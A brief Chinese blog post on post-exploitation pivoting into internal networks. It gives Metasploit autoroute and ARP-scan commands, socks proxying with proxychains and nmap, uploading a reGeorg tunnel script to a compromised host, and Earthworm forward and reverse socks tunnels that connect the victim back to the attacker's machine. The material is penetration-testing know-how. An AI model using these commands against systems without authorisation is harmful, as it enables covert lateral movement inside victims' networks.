内网渗透

3,632次阅读
没有评论

内网渗透

1.msf

拿到一个meterpreter会话后,msf可以很方便的通过添加路由的方式使msf可以攻击内网

meterpreter>run get_local_subnets //获取子网/子网掩码

添加路由
meterpreter>run autoroute -s 子网/子网掩码
或
msf>route add 子网 子网掩码 seesion_id

内网主机存活扫描
meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24

使nmap等工具也可以扫描内网

1.scoks4代理(支持tcp,sock5支持tcp/udp)
use auxiliary/server/socks4a

2.proxychains/proxifier等全局代理软件
proxychains4 nmap -sT ip

2.proxychains/proxifier+reGeorg

1.上传tunnel脚本到靶机
2.python reGeorgSocksProxy.py -u http://ip/tunnel //开启socks服务
3.配置proxychains/proxifier使用socks服务

3.Earthworm(socks5代理)

1.正向,在靶机开启socks服务

ew –s ssocksd –l 888

2.反向

本机添加一个转接隧道,把1080端口收到的代理请求转交给888端口
ew -s rcsocks -l 1008 -e 888

在靶机上开启socks服务,并反弹到本机888端口上
ew -s rssocks -d 本机ip -e 888

接下来就可以配置全局代理软件访问本机1008端口使用靶机socks服务了

Hasukannal
版权声明:本站原创文章,由 Hasukannal 2018-12-01发表,共计695字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
评论(没有评论)
验证码
载入中...